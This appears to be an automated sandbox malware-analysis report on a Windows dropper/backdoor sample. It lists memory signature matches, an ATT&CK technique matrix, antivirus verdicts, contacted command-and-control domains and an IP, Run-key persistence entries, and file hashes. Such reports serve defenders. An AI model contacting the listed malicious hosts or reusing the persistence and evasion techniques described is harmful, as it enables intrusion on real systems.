Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: cmd.exe

17_2_00405671

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 Windows Service	1 Access Token Manipulation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	11 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Windows Service	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	121 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Service Execution	Logon Script (Windows)	122 Process Injection	3 Obfuscated Files or Information	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	2 Clipboard Data	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	13 Software Packing	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	33 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	11 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	121 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	122 Process Injection	Proc Filesystem	3 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kyFBQxVbsg.exe	46%	Virustotal		Browse
kyFBQxVbsg.exe	58%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
kyFBQxVbsg.exe	100%	Avira	TR/Dropper.MSIL.Gen
kyFBQxVbsg.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	100%	Avira	TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	58%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph

Unpacked PE Files

Source	Detection	Scanner	Label	Download
26.2.InstallUtil.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
26.0.InstallUtil.exe.400000.1.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
26.0.InstallUtil.exe.400000.7.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
17.0.InstallUtil.exe.400000.8.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
0.2.kyFBQxVbsg.exe.2e0000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
28.0.InstallUtil.exe.400000.5.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
26.0.InstallUtil.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
17.0.InstallUtil.exe.400000.2.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
17.0.InstallUtil.exe.400000.3.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
17.0.InstallUtil.exe.400000.4.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
19.2.Qerdo.exe.40000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
28.0.InstallUtil.exe.400000.3.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
17.0.InstallUtil.exe.400000.7.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
28.0.InstallUtil.exe.400000.7.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
17.0.InstallUtil.exe.400000.1.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
26.0.InstallUtil.exe.400000.2.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
17.0.InstallUtil.exe.400000.6.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
19.0.Qerdo.exe.40000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
28.2.InstallUtil.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
28.0.InstallUtil.exe.400000.4.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
17.0.InstallUtil.exe.400000.5.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
28.0.InstallUtil.exe.400000.6.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
24.2.Qerdo.exe.9a0000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
28.0.InstallUtil.exe.400000.1.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
26.0.InstallUtil.exe.400000.8.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
24.0.Qerdo.exe.9a0000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
26.0.InstallUtil.exe.400000.5.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
17.2.InstallUtil.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
0.0.kyFBQxVbsg.exe.2e0000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
17.0.InstallUtil.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
28.0.InstallUtil.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
26.0.InstallUtil.exe.400000.6.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
26.0.InstallUtil.exe.400000.4.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
28.0.InstallUtil.exe.400000.2.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
28.0.InstallUtil.exe.400000.8.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
26.0.InstallUtil.exe.400000.3.unpack	100%	Avira	BDS/Backdoor.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
nikahuve.ac.ug	4%	Virustotal		Browse
tuekisaa.ac.ug	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
nikahuve.ac.ug	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nikahuve.ac.ug	194.5.98.107	true	true	4%, Virustotal, Browse	unknown
tuekisaa.ac.ug	unknown	unknown	true	2%, Virustotal, Browse	unknown
parthaha.ac.ug	unknown	unknown	true		unknown
kalskala.ac.ug	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
nikahuve.ac.ug	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	InstallUtil.exe	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.98.107	nikahuve.ac.ug	Netherlands		208476	DANILENKODE	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	652393
Start date and time: 26/06/202209:43:27	2022-06-26 09:43:27 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	kyFBQxVbsg.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/10@117/1
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 39.4% (good quality ratio 37.4%) Quality average: 83.7% Quality standard deviation: 26.4%
HCA Information:	Successful, ratio: 98% Number of executed functions: 95 Number of non-executed functions: 178
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
Execution Graph export aborted for target powershell.exe, PID 6288 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:45:12	API Interceptor	38x Sleep call for process: powershell.exe modified
09:45:54	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qerdo "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
09:46:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qerdo "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
194.5.98.107	zk6ZBXX1Ly.exe	Get hash	malicious	Browse
	2i2qY5a93Z.exe	Get hash	malicious	Browse
	ZzoNsdoVBG.exe	Get hash	malicious	Browse
	bu3OeThpRl.exe	Get hash	malicious	Browse
	KcqH9eRVWL.exe	Get hash	malicious	Browse
	TZmDdSXSX9.exe	Get hash	malicious	Browse
	GeU9eHNGK4.exe	Get hash	malicious	Browse
	TtbGUPFHJ1.exe	Get hash	malicious	Browse
	KaouHjyjuw.exe	Get hash	malicious	Browse
	RTQFHtPW9x.exe	Get hash	malicious	Browse
	xXkS59OGX5.exe	Get hash	malicious	Browse
	7STXNgZD3g.exe	Get hash	malicious	Browse
	3RMrCj8dB1.exe	Get hash	malicious	Browse
	TWAueCcfK3.exe	Get hash	malicious	Browse
	VHp0AIIlQG.exe	Get hash	malicious	Browse
	Pvxc3y0WEe.exe	Get hash	malicious	Browse
	Rj8kKjt7fP.exe	Get hash	malicious	Browse
	HrcD1NM6Cc.exe	Get hash	malicious	Browse
	FCKjDKDgdv.exe	Get hash	malicious	Browse
	eScInnIuzW.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
nikahuve.ac.ug	zk6ZBXX1Ly.exe	Get hash	malicious	Browse	194.5.98.107
	2i2qY5a93Z.exe	Get hash	malicious	Browse	194.5.98.107
	ZzoNsdoVBG.exe	Get hash	malicious	Browse	194.5.98.107
	xZPhFJvfZh.exe	Get hash	malicious	Browse	194.5.98.107
	bu3OeThpRl.exe	Get hash	malicious	Browse	194.5.98.107
	KcqH9eRVWL.exe	Get hash	malicious	Browse	194.5.98.107
	TZmDdSXSX9.exe	Get hash	malicious	Browse	194.5.98.107
	GeU9eHNGK4.exe	Get hash	malicious	Browse	194.5.98.107
	LF6Ay6prId.exe	Get hash	malicious	Browse	185.244.30.199
	9abTU6oWsK.exe	Get hash	malicious	Browse	185.244.30.199
	B4Bd65Yr8j.exe	Get hash	malicious	Browse	185.244.30.199
	vdP1iGsD6i.exe	Get hash	malicious	Browse	185.244.30.199
	f9483RfaBQ.exe	Get hash	malicious	Browse	185.244.30.199
	gkh3UnDFDj.exe	Get hash	malicious	Browse	185.244.30.199
	pgzC7bbBhY.exe	Get hash	malicious	Browse	185.244.30.199
	Abl9mKVK3M.exe	Get hash	malicious	Browse	185.244.30.199
	F5G2c1KaGS.exe	Get hash	malicious	Browse	185.244.30.199

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DANILENKODE	SecuriteInfo.com.W32.AIDetectNet.01.22642.exe	Get hash	malicious	Browse	194.5.98.245
	SecuriteInfo.com.W32.AIDetectNet.01.967.exe	Get hash	malicious	Browse	194.5.98.245
	commercial invoice and packing list.exe	Get hash	malicious	Browse	194.5.98.9
	x8WpnKAlsx.exe	Get hash	malicious	Browse	194.5.98.212
	Client-builts.exe	Get hash	malicious	Browse	194.5.98.212
	Shipping documents and revised BL.vbs	Get hash	malicious	Browse	194.5.98.219
	SEIjqoLyloVjnew.js	Get hash	malicious	Browse	194.5.97.3
	zk6ZBXX1Ly.exe	Get hash	malicious	Browse	194.5.98.107
	2i2qY5a93Z.exe	Get hash	malicious	Browse	194.5.98.107
	Electronic receipt #AMZ-HWRM-1605160622.js	Get hash	malicious	Browse	194.5.97.3
	pendiente factura 2022.jar	Get hash	malicious	Browse	194.5.97.3
	Custom Clearance Doc. AWB#5305323204643.js	Get hash	malicious	Browse	194.5.97.3
	houdini.vbs.vbs	Get hash	malicious	Browse	194.5.97.17
	fatura.exe	Get hash	malicious	Browse	194.5.98.231
	uRfHl1hL84.exe	Get hash	malicious	Browse	194.5.97.203
	Purchase Order SYD22061.xlsx	Get hash	malicious	Browse	194.5.97.203
	Documents for your perusal.js	Get hash	malicious	Browse	194.5.97.3
	sample listings skptpdf0842.js	Get hash	malicious	Browse	194.5.97.3
	Documents for your perusal.js	Get hash	malicious	Browse	194.5.97.3
	RMB_payment.js	Get hash	malicious	Browse	194.5.97.3

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qerdo.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	805
Entropy (8bit):	5.360596073797118
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhIE4K5AE4Kzr7r1qE4j:MxHKXwYHKhQnoIHK5AHKzvr1qHj
MD5:	EBFA21D930F1B37DA9DDD9D7E276F9DE
SHA1:	E97B403CAA3A03D0E8BDAC6E66FFBE47555A38E5
SHA-256:	5B9B2A9380AFEBEC985FA5745B9354DBBD4C889542B3EFE5446D24E8430A3752
SHA-512:	13D58B48DB79A6D8A8851186ECD309BB22B859D1FC064B8E05108378F06A71110A1AAE5622E4C61DA201192809BE4910B86037BFC2E4F4261942D6E3EC11DC14
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kyFBQxVbsg.exe.log

Download File

Process:	C:\Users\user\Desktop\kyFBQxVbsg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	805
Entropy (8bit):	5.360596073797118
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhIE4K5AE4Kzr7r1qE4j:MxHKXwYHKhQnoIHK5AHKzvr1qHj
MD5:	EBFA21D930F1B37DA9DDD9D7E276F9DE
SHA1:	E97B403CAA3A03D0E8BDAC6E66FFBE47555A38E5
SHA-256:	5B9B2A9380AFEBEC985FA5745B9354DBBD4C889542B3EFE5446D24E8430A3752
SHA-512:	13D58B48DB79A6D8A8851186ECD309BB22B859D1FC064B8E05108378F06A71110A1AAE5622E4C61DA201192809BE4910B86037BFC2E4F4261942D6E3EC11DC14
Malicious:	true
